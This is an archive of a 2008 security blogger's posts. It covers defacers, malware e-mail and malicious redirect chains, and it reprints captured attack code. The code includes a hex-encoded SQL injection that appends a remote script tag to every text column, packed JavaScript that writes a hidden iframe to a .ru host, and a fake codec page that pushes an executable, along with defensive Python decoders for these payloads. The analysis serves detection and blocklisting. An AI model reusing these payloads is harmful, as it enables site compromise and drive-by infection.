Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 30 September 2008

cr4nk responds - OH NOEZ!

Alas, poor skiddie, for thou shalt be ridiculed! ..... On Tuesday 28th Sept, I sent the following to our dear cr4nk, as I was in a funny mood (I get like that occasionally) and fancied having a laugh. I never expected a response, but boy, am I glad he did (it took a week, but he finally got there, lol);

Dear cr4nk,
     I'd like to thank you for playing "how to be an unsuccessful skiddie" and giving me the opportunity to shut down your website (I really did enjoy doing that). Alas, it would appear you've still not learnt, however, so rest assured, we'll be following you until you stop attacking people's servers.


One week later, and it seems that whilst his spelling leaves a lot to be desired, he did actually respond ..... and OH NOEZ! the "leet" skiddie (sorry, "genius hacker" LOL!) is telling me to, err, shut up?

well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


... and he must be feeling rather bold - he's not even bothered to try and disguise where his e-mail is coming from, lol.

Exported by: Outlook Export v0.1.2


From: cr4nk@land.ru
E-mail:cr4nk@land.ru [ 82.204.219.251 - pochta.ru ]
Date: 01/10/2008 00:47:01
Subject: Re: Woops
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


**************************************************************************
Headers
**************************************************************************
Return-Path: <cr4nk@land.ru>
Delivered-To: services@[RM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-124.livemail.co.uk (Postfix) with SMTP id 8621B8A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from web22.pochta.ru (web22.pochta.ru [82.204.219.122])
by smtp-in-124.livemail.co.uk (Postfix) with ESMTP id 706378A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from [127.0.0.1] (helo=localhost)
by web22.pochta.ru ( sendmail 8.13.3/8.13.1) with esmtp id 1Kkovl-0001E7-RC
for services@[RM]; Wed, 01 Oct 2008 03:47:01 +0400
Message-ID: <20081001034701.dw3sqc7b40g4480g@www.pochta.ru>
Date: Wed, 01 Oct 2008 03:47:01 +0400
From: cr4nk@land.ru
To: Steven <services@[RM]>
Subject: Re: Woops
In-Reply-To: <00e301c920fc$a58cb800$0c00a8c0@THCP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_69eh72h9ns00"
Content-Transfer-Encoding: 7bit
X-Mailer: Free mail service Pochta.ru; WebMail Client; Account:
cr4nk@land.ru
X-Proxy-IP: [84.187.66.163]
X-Originating-IP: [84.187.66.163]
X-Original-To: services@[RM]


Is it just me, or are these young kids getting too big for their boots? First PRMF thanks me for shutting down his site, swears a bit, then invites me to find and shut down the rest, and now this "d00d", with all of his self-confessed "genius", can also only come up with a "shut up" and profanity.

I remember when skiddies actually had some cajones ..... But in the meantime, I'm happy to report that some friends and I have been locating sites that have been "hacked" by cr4nk and his little group of nut jobs, and have been getting them either shut down or cleaned (depending on the owner/hosting co).

If you've been a victim of cr4nk, feel free to drop him an e-mail and give him your thoughts - he seems to like it (but don't forget to report the attack to the authorities and/or your hosting company too).

/edit

Rofl, not long after posting this, he followed up with;

basstard u think u can stop us. we will hack the world man. so we are not some script kiddis we are writing our own exploits also shut up and FUCK YOU

AVs throwing virus warnings for the hpHosts blog and forums

This is a quick note for those of you seeing virus warnings for the hpHosts blog and forums. These are false positives, caused by the AVs detecting the malicious code posted here (obviously a good thing), but evidently not realising that it's not able to do any harm.

Avast, Avira and the developers of LinkScanner have been contacted. In the meantime, if it will make you feel safer (and indeed I'd recommend doing it anyway), disable scripts when visiting the blog/forums.

/edit

Whilst doing some testing, I've noticed that Avira (what I've got) only flags it when the blog is loaded in Trident-based shells such as Avant Browser/Internet Explorer (with or without scripts enabled) - it doesn't flag it when loaded in Opera.

Hex injection, they are persistent .......

If you've read this blog at all lately, you'll no doubt have read the previous entries I've made concerning this, and hilariously, they're still trying - evidently not realising their attempts aren't going to work.

The latest attempt comes from 201-92-227-227.dsl.telesp.net.br (IP: 201.92.227.227), and is in the same form as previously;

2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0


The part we're interested in, as before, is the hex between CAST( and %20AS%20VARCHAR (%20 is the URL-encoded space character, so that reads AS VARCHAR). Decoded, the hex this time translates to;

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
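As an added example (not code from this post), here is a small Python checker for IIS log lines in the form above: it URL-decodes the query, pulls the hex out of CAST(0x... AS VARCHAR), decodes it (the NVARCHAR/UTF-16 variant included) and lists the script URLs the statement would append to every text column. The hex blob and log line inside it are constructed from the decoded statement quoted above, since the original hex isn't reproduced here.

```python
import re
import urllib.parse
from typing import Optional

# Added example, not code from the post. The decoded statement below is the
# one quoted above; the hex blob and the log line are CONSTRUCTED from it
# because the original hex is not reproduced here.
DECODED_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND "
    "a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/"
    "script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# VARCHAR payloads are one byte per character, so the blob is plain ASCII hex.
HEX_BLOB = "0x" + DECODED_SQL.encode("ascii").hex().upper()

# Constructed IIS W3C log line laid out like the one quoted above:
# date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) ...
SAMPLE_LOG_LINE = (
    "2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(" + HEX_BLOB + "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - "
    "201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;"
    "+.NET+CLR+2.0.50727) - 200 0 0"
)

# CAST(0x<hex> AS [N]VARCHAR(...)) after URL-decoding. Case-insensitive,
# since SQL Server is and the casing varies between attempts.
CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=['\"]?([^'\">\s]+)", re.IGNORECASE)


def decode_cast_hex(hex_digits: str) -> str:
    """Turn the hex from CAST(0x... AS [N]VARCHAR) back into text.

    NVARCHAR variants carry UTF-16LE, which shows up as every second byte
    being 0x00; everything else is treated as single-byte text. A stray
    trailing nibble (truncated log) is dropped rather than raising.
    """
    raw = bytes.fromhex(hex_digits[: len(hex_digits) // 2 * 2])
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyse_log_line(line: str) -> Optional[dict]:
    """Return details of a hex CAST injection found in one log line, else None."""
    fields = line.split(" ")
    if len(fields) < 8:
        return None
    query = urllib.parse.unquote(fields[4])  # cs-uri-query
    match = CAST_HEX_RE.search(query)
    if not match:
        return None
    sql = decode_cast_hex(match.group(1))
    return {
        "client_ip": fields[7],  # c-ip
        "uri_stem": fields[3],
        "decoded_sql": sql,
        "script_urls": SCRIPT_SRC_RE.findall(sql),
        # a cursor over sysobjects/syscolumns plus UPDATE is the mass-defacement signature
        "mass_update": "Table_Cursor" in sql and "UPDATE" in sql.upper(),
    }


def scan_log(lines):
    """Run analyse_log_line over an iterable of log lines, keeping only the hits."""
    return [hit for hit in (analyse_log_line(l) for l in lines) if hit]


if __name__ == "__main__":
    for hit in scan_log([SAMPLE_LOG_LINE]):
        print(hit["client_ip"], hit["uri_stem"], hit["script_urls"])
```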


This shows us they've got another URL, pormce.ru. If we run this through vURL we see;

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))


Which is the usual obfuscation rubbish we're used to, and it's very easily decoded using Malzilla;

window.status="";n=navigator.userLanguage.toUpperCase();if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){var $a=document.cookie;var $b=$a.indexOf("cvbest=");if($b!=-1){}else{var $c=new Date();$c.setTime($c.getTime()+3*3600*1000);document.cookie="cvbest=update;expires="+$c.toGMTString();try{document.write("<iframe src=http://deryv.ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>")}catch(e){}}}


This shows us another URL, this time pointing to deryv.ru. This script contains two more scripts that I've not decoded yet, but they're very similar to the previous Asprox injections.
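For anyone without Malzilla to hand, here is an added Python unpacker (not the post's own code, nor Malzilla's) for the eval(function(p,a,c,k,e,d){...}) packer used by the pormce.ru script above, plus a URL extractor for pulling blocklist indicators out of the result. PACKED_P and PACKED_K are the p and k arguments copied from that script; the decoded output is the script shown above.

```python
import re

# Added example, not code from the post. The p and k arguments below are
# copied from the packed pormce.ru script quoted above (a = c = 58).
PACKED_P = r'''s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}'''
PACKED_A = 58
PACKED_C = 58
PACKED_K = ('||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID|'
            '|userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|'
            'deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|'
            'toGMTString|3600|1000|update|expires|getTime|Date').split('|')


def _encode_token(n, base):
    """Mirror the packer's e() helper: 0-9, then a-z, then chr(n+29) for 36 and up."""
    prefix = '' if n < base else _encode_token(n // base, base)
    r = n % base
    if r > 35:
        digit = chr(r + 29)
    elif r >= 10:
        digit = chr(ord('a') + r - 10)
    else:
        digit = str(r)
    return prefix + digit


def unpack(p, a, c, k):
    """Replace each word token in p with its dictionary entry.

    The packer leaves a token unchanged when its k[] entry is empty (that is
    what `k[c]||e(c)` does in the eval'd function), so the table does the same.
    A single regex pass is used instead of the packer's 58 sequential
    replaces, which avoids one replacement's output being re-substituted.
    """
    table = {}
    for i in range(c):
        token = _encode_token(i, a)
        word = k[i] if i < len(k) else ''
        table[token] = word or token
    return re.sub(r'\b\w+\b', lambda m: table.get(m.group(0), m.group(0)), p)


def extract_urls(js):
    """Pull http(s) URLs out of decoded script text, for blocklisting."""
    return sorted(set(re.findall(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>]*)?", js)))


def decode_pormce_loader():
    """Decode the packed pormce.ru loader quoted in the post."""
    return unpack(PACKED_P, PACKED_A, PACKED_C, PACKED_K)


if __name__ == "__main__":
    decoded = decode_pormce_loader()
    print(decoded)
    print("URLs:", extract_urls(decoded))
```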

hpHosts - Updated September 30th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 50,909 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 30/09/2008 21:30

  2. Last Verified: 30/09/2008 21:00
Download hpHosts now!
http://hosts-file.net/?s=Download

hpHosts - The largest removal to date!

I'm running the final pass validation for the latest release of hpHosts as I write this, and I've noticed something over the last week. When I started the validation process, there were around 4800 or so domains not resolving. Up to this current pass, that's been reduced to just over 4000. However, all of those have, thus far, failed to resolve on every pass.

This makes it, by far, the biggest removal to date for hpHosts. Whether this is directly connected to the Atrivo/Intercage/EstDomains farce is anyone's guess, but I'm betting it's certainly got a lot to do with it.

The final pass should be done within the hour, and once those still not resolving are moved from the database to a monitoring list, I'll begin the prep for the actual release itself - hopefully this should be out by 23:00 (approx 3 hours or so).

/edit

The final number removed is: 4075

Saturday 27 September 2008

PRMF: 0, good guys: 1

Okay, so I don't have a really cool name like The Goddamn Batman, nor do I have a beat stick - but I do take a rather perverse pleasure, nonetheless, in shutting down idiots that are stupid enough to ask on the WOT forums if their site's rating can be changed to green instead of yellow.

I am of course, talking about PRMF, who in August, wrote (partial quote) in the WOT forums;

I know, this website have SPAM this forum, but the owner don´t know that, and says SORRY in name of all the comunity...
But it´s a safe forum... Why yellow?
Please,check this....


Two problems here. Firstly, the person posting this IS the owner of the site in question, so either he's talking about himself in the third person, or he thinks those in the WOT forums are stupid ...... sadly, further on, we saw it was actually the latter, when, after being shown some of the problems with his site, he wrote;

The section XXX is only available to users over 18 per registration, no child has access to the areas , and that comments is to try make my rating up... If they was wrong, i´m sorry and coul delete them? Thanks...

In prmf.realmsn.com/Parceiros-h1.htm its in big red letters that
"O PRMF Fórum não se responsabiliza pelo conteúdo de qualquer site em baixo. São da exclusiva responsabilidade de cada um dos seus autores"
in english:
"The PRMF Forum is not responsible for the content of any site below. They are the sole responsibility of each of its author"

then all those websites are not of my responsibility and I have nothing to do with it and her contents ...

Thanks you!

PRM


In this particular comment, he was referring to the malware I showed him he was linking to, and the XXX section of his site, which was (contrary to his claims) available to kids (more on this further on) - naughty naughty. Further to this, he stupidly admitted that he had commented so many times on his site's scorecard in order to try and manipulate the site's rating - this isn't going too well so far, and it's about to get worse.

On September 1st, he proudly mentioned his XXX section was gone - and it was, so we focused on the other problem - his site's offering of warez. Whilst researching his site a little more, I noticed an increasing issue with the account I was using. When I mentioned this on the WOT forums, he claimed my account had not been deleted but had, in fact, been put back into verification - then an e-mail from his site proved my original theory, that he'd deleted my account, correct;

Translated version of the e-mail;

"You received this email autopilot because its account at "..::: PRMF Forum :::.." -- hxxp://prmf.realmsn.com has just been excluded.
To know precisely the reasons for exclusion, contact the administrator."

Original;

"Você recebeu este e-mail automatico porque a sua conta em "..::: PRMF Fórum :::.." - hxxp://prmf.realmsn.com acabou de ser excluída.
Para conhecer precisamente os motivos da exclusão, entre em contato com o administrador."


Woops? Way to look legit there - lock out the researcher. Unfortunately for this idiot, he obviously didn't realize that it simply takes a matter of milliseconds to create a new account.

On September 2nd, I decided to check his site again, and was surprised to find he'd re-included the XXX section (obviously he'd not gotten rid of it - just hidden it, as all the content was still there). Mentioning this on the forums, and further mentioning the fact his site was still offering warez, I was not surprised to note that to date, he's not been back - evidently realizing that researchers aren't newbies that can be fooled so easily.

On September 23rd, I decided to revisit the site to see what, if anything, had changed. Sadly, it had only changed for the worse. His site was still offering warez, still allowing kids to access the porn section - and now made matters worse, as I found a couple of the posts in the XXX section that were quite clearly child pornography.

Warez is bad enough, and allowing kids to access porn is bad enough - but to allow your users to post what is blatantly underage porn is unforgivable - and not something I take lightly. I decided enough was enough and reported his site not only to the MET (UK Police), but also to CEOP (Child Exploitation and Online Protection Centre) and the IWF (Internet Watch Foundation).

Further to this, I also reported his site to the company that provided his forums, their upstream provider, and their registrar. The reason I did not report this only to the company providing the forums is that in the past, when I've done this, it's resulted in nothing being done. Taking a multi-pronged approach almost always guarantees someone is going to do something.

Thankfully my approach worked, as on checking the site again on September 27th, I was presented with the following notice;



Translated;



I didn't get a reply from anyone I reported the site to, and to be honest - I'm not bothered - something was done, that's the main thing.

References

Yellow?
http://www.mywot.com/en/forum/1486-yellow

PRMF.Realmsn.com Scorecard
http://www.mywot.com/en/scorecard/prmf.realmsn.com

Reporting Child Pornography

IWF (Internet Watch Foundation)
http://www.iwf.org.uk/reporting.htm

CEOP (Child Exploitation and Online Protection Centre)
http://www.ceop.gov.uk/ceop_report.aspx

National Center for Missing & Exploited Children
https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US

International Agencies
http://vachss.com/help_text/report_child_porn_intl.html

Friday 26 September 2008

Full Circle Magazine: Issue 17 is here!

I've been an avid reader of this since coming across it several releases ago, and am happy to say that the latest release is now available.

What is Full Circle Magazine?

Full Circle is a free, independent, magazine dedicated to the Ubuntu family of Linux operating systems.

Description courtesy of the FCM website. Whilst mostly true, a lot of the stuff in their magazines is actually applicable to other Linux distros too :o), and, whilst not mentioned, their magazines are provided as downloadable PDFs.

Whats in the latest release?
  1. Command and Conquer - Nano & Vim.
  2. How-To : Program in C - Part 1, Connect to IRC, Using GIMP - Part 6 and Scan & Convert to PDF.
  3. My Story - …When I Was Two
  4. My Opinion - Is This The Year?
  5. MOTU Interview - Harald Sitter
  6. Top 5 - Email Notifiers
Great!, where can I download it?

You can download the latest release at;

http://fullcirclemagazine.org/issue-17/

... and previous releases from;

http://fullcirclemagazine.org/downloads/

RSS Feed:
http://fullcirclemagazine.org/feed/

Bits from Bill: Vote2008 WinPatrol Discount Coupon

Like Bill, I'm no expert on politics either, but personally - I'd give every UK votizen the same discount just to vote out Labour if it had been me ......

Anywho, for those of you that don't have WinPatrol Plus yet (why not??????), Bill is offering a $10 discount (I'm not up on exchange rates, but I believe it's around £20) to those that purchase WinPatrol Plus until, as Bill puts it;

.... a reasonable agreement is reached to prevent additional collapse in the financial market


I've absolutely no idea what that means or refers to as I don't follow UK politics let alone US politics, but I'm guessing that means something bad is happening?

Read Bill's full post on this subject at;

Bits from Bill: Vote2008 WinPatrol Discount Coupon

If for some unknown reason (and it has to be unknown, as I can't think of a single reason not to have it!) you don't actually have WinPatrol yet - GET IT! You can download it for free ('tis the non-PLUS version) from;

www.winpatrol.com

Amazing books! (HIDDENEXT/Worm.Gen and Troj/Agent-HTC)

There are two problems with these e-mails ..... firstly, I did not write a book, and secondly, even if I had, they're under the misconception that I can actually write good books LOL!

Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff. It's certainly this year's best in its genre. You seem to never going to quit surprising us. We have made a contract with you and guarantee that the first edition will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


The attachment (31K) is named approved.zip and contains a file named "approved.doc[MANY_SPACES].exe", and detection for it is rubbish;

http://www.virustotal.com/analisis/c4b44222d1d498c795f220989921693a


The e-mail in all of its glory;

Subjects thus far:

Amazing Book
Excellent Book

Exported by: Outlook Export v0.1.2


From: Susana Hurley
E-mail:unwhchm@bostoncf.com [ - Invalid IP was passed to me ]
Date: 26/09/2008 16:18:01
Subject: Amazing Book
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff.
It's certainly this year's best in its genre. You seem to never going to
quit surprising us.
We have made a contract with you and guarantee that the first edition
will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank
you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


**************************************************************************
Headers
**************************************************************************
Return-Path: <unwhchm@bostoncf.com>
Delivered-To: services@[RMD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4FBE466E6E3
for <services@[RMD]>; Fri, 26 Sep 2008 16:18:03 +0100 (BST)
Received: from [163.153.27.216] (unknown [163.153.27.216])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id E685566E6D4
for <burnservices@[RMD]>; Fri, 26 Sep 2008 16:18:01 +0100 (BST)
Received: from [163.153.27.216] by mail.global.frontbridge.com; Fri, 26 Sep 2008 10:18:01 -0500
Date: Fri, 26 Sep 2008 10:18:01 -0500
From: "Susana Hurley" <unwhchm@bostoncf.com>
X-Mailer: The Bat! (v3.71.01) Professional
Reply-To: unwhchm@bostoncf.com
X-Priority: 3 (Normal)
Message-ID: <787369064.27570604130467@bostoncf.com>
To: burnservices@[RMD]
Subject: Amazing Book
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------8401675F8425842C"
X-Original-To: burnservices@[RMD]

Royal Navy won't fight pirates 'in case they claim asylum'

Normally this wouldn't catch my attention - I couldn't care less about our armed forces, they've been a joke for a very long time (not their fault, it's those in charge we've got to blame) - but this is just pathetic.

British Foreign Office officials are understood to have advised the Royal Navy not to confront or arrest pirates in the region for fear of transgressing human rights legislation or encouraging their seeking asylum once taken to the UK.


http://www.theregister.co.uk/2008/09/25/royal_navy_pirate_asylum_seekers/

My brother's in the Navy - think I'll see if I can get hold of him and ask about this. Personally, I think the Navy should tell those in charge to shove it, and blow the pirates out of the water - they couldn't care less about human rights, so why should the Navy care about theirs?

In the meantime, the comments by Nick pretty much sum up my thoughts;

They used to say that an Englishman could safely walk across the breadth of the British empire unprotected because no one dared provoke the armed forces. Maybe I should practice my French instead...

Kentucky (secretly) commandeers world's most popular gambling sites

I tend to agree with a lot of the commenters on the article that this has far-reaching implications, and Kentucky shouldn't have been allowed to do this. However, I've also got a more important question - why didn't they go after the sites that actually infect people? That would've been a much better idea.

The state of Kentucky has seized control of some of the world's most popular gambling domain names courtesy of a state judge who issued a secret ruling last week ordering registrars to transfer 141 internet addresses to the state's top law enforcement official.

The order (PDF) by Franklin County Circuit Judge Thomas Wingate applies to sites including absolutepoker.com, goldenpalace.com, and ultimatebet.com. The websites, many of which are operated outside US borders, stand accused of illegally making their services available to Kentucky citizens. Already, whois records list goldencasino.com as the rightful property of J. Michael Brown, the Justice and Public Safety secretary who filed the lawsuit. At time of writing, goldencasino.com and the handful of other affected websites we checked appeared to be offering unfettered online gambling services.


Read the full article at El Reg;

http://www.theregister.co.uk/2008/09/26/gambling_domain_seizure/

Wednesday 24 September 2008

Mylot.com codec infection madness!

Public profiles are a great way to tell people about yourself; just look at the hundreds of sites that offer such a feature. These features, however, can be just as bad for the visitor. Take the following for example;



This profile contains a lovely little link that takes you to;

http://superelectionpolls.info/Teens_Video.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/Teens_Video.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:08:48
*****************************************************************
<head>
<title> HOT VIDEO SENASTION ONLY HERE!!!</title>
<meta http-equiv="Content-Language" content="en-us" >
<meta name="robots" content="index, follow" >
<META NAME="Keywords" CONTENT="full on bush,george bush on obama"/>
<meta name="description" content="full on bush, nunn bush penny loafer, zshare jennifer bush, full on bush, bush ak20 television user manual, bush iraq troop reduction/">
<meta name="revisit-after" content="2 days">
<meta name="rating" content="general">
</head>
<p><IFRAME src="test.html" width="1200" height="1000"
scrolling="auto" frameborder="1">
</IFRAME>
</p>
<br>


As you can see, this loads an iFrame that then loads;

http://superelectionpolls.info/test.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/test.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:47:48
*****************************************************************
<html>
<head>
<title>
fastguidan.info
</title>
</head>
<BODY bgcolor="FFFFCC">
<script type="text/javascript" language="javascript">
eval(unescape("myvar1%3D5462%3B%0D%0Amyvar4%3Dmyvar1%3B%0D%0Aif%28myvar1%3D%3Dmyvar4%29%20document%2Elocation%3D%22http%3A%2F%2Falldebt%2Ebiz%2Fnewway%2Fin%2Ecgi%3F5%22%3B%0D%0A"));
</script>

</body>

</html>


This then loads the following little script;

eval(unescape("myvar1=5462;
myvar4=myvar1;
if(myvar1==myvar4) document.location="http://alldebt.biz/newway/in.cgi?5";
"));


Which as you can see, takes you to;

http://alldebt.biz/newway/in.cgi?5

.... which is where the fun begins. alldebt.biz uses a 302 redirect;

HTTP/1.1 302 Found
Date: Wed, 24 Sep 2008 22:27:29 GMT
Server: Apache/1.3.36 (Unix) mod_fastcgi/2.4.2 PHP/5.1.4 FrontPage/5.0.2.2510
Set-Cookie: SL_5_0000=_5_; domain=alldebt.biz; path=/; expires=Thu, 25-Sep-2008 22:27:29 GMT
Location: http://theprivatetube.com/1/0/0/693/0/white/
Transfer-Encoding: chunked
Content-Type: text/html


Which as you can see, takes us to theprivatetube.com, which loads;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://alldebt.biz/newway/in.cgi?5
Server IP: 72.232.180.163 [ 163.180.232.72.static.reverse.ltdomains.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 5
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:49:38:49
*****************************************************************
<html>
<head>
<title>Free movies online</title>
<style>
#alertMessage {
background: #000000 url(/error.png) no-repeat scroll 0pt;
height: 129px;
visibility: hidden;
width: 384px;
z-index: 2;
position: absolute;
}

body {
background-color: white;
font-family:Tahoma;
align:center;
}
</style>
<script>

function simpleRedirect()
{
document.getElementById("alertMessage").style.visibility = "hidden";
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function openCodec()
{
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function alertInstall()
{
alert("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library.");
openCodec();
}

function askInstall()
{
if (confirm("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library."))
simpleRedirect();
else
alertInstall();
}

function hideAlert()
{
document.getElementById("alertMessage").style.visibility="hidden";
simpleRedirect();
}

function docLoad()
{
document.body.onbeforeunload="askInstall();return false";
}
</script>
<script src="/dnd.js"></script>
</head>
<body>
<div style="font:17px Tahoma;color:black;" align="center">

</div>
<div id="alertMessage" onmousedown="this.style.zIndex=10;StartDrag(event,this,PutBack)" name="errorMsg">
<div id="alertTitle"
style="position: relative; top: -14px; left: 360px; width: 20px; height: 20px; font-size: 14px; color: white; font-weight: bold; border: none"
onclick="hideAlert();">
<div style="display: none"> </div>
</div>
<div id="alertText"
style="position: relative; top: 20px; left: 60px; width: 300; font-size: 12px; font-name: Arial">
Windows Media Player cannot play the file. The Player does not support the format you are trying to play. Please install video codec update.</div>
<div id="alertButtons"
style="position: relative; top: 30px; left: 100px" /><input
type="button" onclick="simpleRedirect()"
value="  Ok  " /> <input type="button"
onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()"
value="  Continue  " /></div>
</div>

<table width="100%" align="center" valign="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="center"><img src="/img/prev_1_0.png"
onclick="simpleRedirect();" style="border: 1px solid white" /></td>
</tr>
</table>
<script>
<!--
setTimeout("showAlert();", 1000);

function showAlert()
{
var p=document.getElementById("alertMessage");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-145;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
-->

</script>
</body>
</html>


This then loads a 187K executable;

